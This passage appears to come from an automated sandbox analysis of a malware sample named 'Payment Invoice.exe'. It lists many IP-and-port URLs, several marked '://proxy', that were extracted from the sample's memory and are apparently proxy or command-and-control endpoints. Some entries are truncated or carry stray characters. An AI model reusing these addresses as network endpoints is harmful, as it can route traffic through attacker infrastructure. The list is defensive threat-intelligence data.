                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.11:8989://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.173:33572
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.173:33572://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.173:448260q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.173:64579
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.173:64579://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.162.180:46369
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.162.180:46369://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.164.200:42624
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.164.200:42624://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.165.203
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.165.203://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.165.203:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.165.6:42624
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.165.6:42624://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:34617
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:34617://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:47558
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:47558://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.191.209:58275
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.191.209:58275://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.197.102:51918
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.197.102:51918://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.197.102:58740
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.197.102:58740://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:34071
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:34071://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:36129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:36129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:40536
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:40536://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:43265
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:43265://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:43435
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:43435://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:49227
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:49227://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:49806
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:49806://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:53340
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:53340://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:54917
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:54917://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:55029
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:55029://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:63452
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:63452://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:31042
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:31042://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:34071
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:34071://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:37976
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:37976://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:48414
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:48414://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:51923
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:51923://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:54047
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:54047://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:55029
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:55029://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:63112
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:63112://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.90.49:58740
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.90.49:58740://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.215.219.157:41697
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.215.219.157:41697://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.215.219.157:48117
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.215.219.157:48117://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.116.75
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.116.75://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.116.75:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.89.84
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.91.11
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.94.166
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.94.166://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.94.166:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.208.185:61927
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.208.185:61927://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.208.98:43704
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.208.98:43704://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.22.184:43494
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.22.184:43494://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.239.103:42771
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.239.103:42771://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.73.148:34447
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.73.148:34447://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.137.197:34455
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.137.197:60200
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.137.197:60200://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.158.204:41274
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631695E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.158.204:41274://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.158.204:46783
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.158.204:46783://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.158.204:46783P
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.158.204:52980
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.158.204:52980://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.207.217
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.207.217://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.207.217:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.45.22:55610
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.45.22:55610://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:46097
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:46097://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:49401
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:49401://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:61579
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:61579://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:46849
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:46849://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:58330
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:58330://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.69:53783
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.69:53783://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:34172
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:34172://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:41442
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:41442://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:46097
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:46097://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:50062
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:50062://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:53477
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:53477://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:31414
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:31414://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:35948
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:35948://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:37876
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:37876://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:40179
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:40179://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:49858
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:49858://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:53755
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:53755://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:57364
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:57364://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:57495
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:57495://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.9
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:31794
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:31794://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:41274://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:44607
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:44607://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:45629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:456290ku
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:45629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:50563
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:50563://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:59991
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:59991://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:60651
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:60651://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:60651x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.66.135:34455
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.66.135:34455://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.66.135:51535
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.66.135:51535://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.66.135:51535p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.70.64:49478
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.70.64:49478://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:35318
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:35318://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.243.102.207:9764
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.243.102.207:9764://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.243.55.12:59179
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.243.55.12:59179://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.247.243.167:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.253.68.97:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.253.68.97:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.55.87.48:5566
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.55.87.48:5566://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.129.251:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.129.251:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.131.178:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.131.178:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.137.49:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.137.49:16379://proxy
